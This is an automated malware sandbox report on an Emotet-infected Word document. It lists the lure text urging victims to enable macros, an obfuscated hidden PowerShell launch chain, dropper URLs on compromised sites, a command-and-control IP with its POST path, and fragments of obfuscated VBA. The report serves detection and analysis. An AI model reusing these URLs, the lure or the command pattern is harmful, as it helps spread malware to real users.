
Analysis Report MAIL-0573188.doc

Overview

General Information

Sample Name: MAIL-0573188.doc
Analysis ID: 337092
MD5: 7ad5e41d03b2dfe72af417fa5b0cc164
SHA1: 2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256: 2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2412 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded command omitted] MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2420 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1976 cmdline: POwersheLL -w hidden -ENCOD [base64-encoded command omitted] MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2484 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2764 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2456 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(5 of 11 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.rundll32.exe.1f0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
13.2.rundll32.exe.1f0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.1b0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.1b0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
13.2.rundll32.exe.1c0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(5 of 16 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: POwersheLL -w hidden -ENCOD [base64-encoded command omitted]

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://veterinariadrpopui.com | Avira URL Cloud: Label: malware
Source: http://veterinariadrpopui.com/content/5f18Q/ | Avira URL Cloud: Label: malware
Source: http://sofsuite.com/wp-includes/2jm3nIk/ | Avira URL Cloud: Label: phishing
Source: http://khanhhoahomnay.net/wordpress/CGMC/ | Avira URL Cloud: Label: malware
Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/ | Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/ | Avira URL Cloud: Label: malware
Source: http://wpsapk.com/wp-admin/v/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: veterinariadrpopui.com | Virustotal: Detection: 7%
Source: khanhhoahomnay.net | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: MAIL-0573188.doc | Virustotal: Detection: 66%
Source: MAIL-0573188.doc | Metadefender: Detection: 47%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_001F75AE CryptDecodeObjectEx,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_001F109C FindFirstFileW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: wpsapk.com
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 45.130.229.91:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.67.141.14:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: global traffic | HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1 | Host: wpsapk.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1 | Host: sofsuite.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1 | Host: veterinariadrpopui.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-content/n/ HTTP/1.1 | Host: shop.elemenslide.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1 | Host: khanhhoahomnay.net | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 209.59.139.39 209.59.139.39
Source: Joe Sandbox View | IP Address: 45.130.229.91 45.130.229.91
Source: Joe Sandbox View | ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
Source: global traffic | HTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1 | DNT: 0 | Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ | Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWz | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 5.2.136.90 | Content-Length: 8068 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90 (9 identical entries)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0020023A InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: wpsapk.com
Source: unknown | HTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1 | DNT: 0 | Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ | Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWz | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 5.2.136.90 | Content-Length: 8068 | Connection: Keep-Alive | Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp | String found in binary or memory: http://beatlemail.net/picture.php?blogid=0
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp | String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp | String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp | String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2109649059.000000001B86F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp | String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaneH)
                      Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: https://shop.elemenslide.com
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: https://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: https://shop.elemenslide.comp
                      Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

                      E-Banking Fraud:

                      Yara detected Emotet

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious strings
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                      Document contains an embedded VBA with base64 encoded strings
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
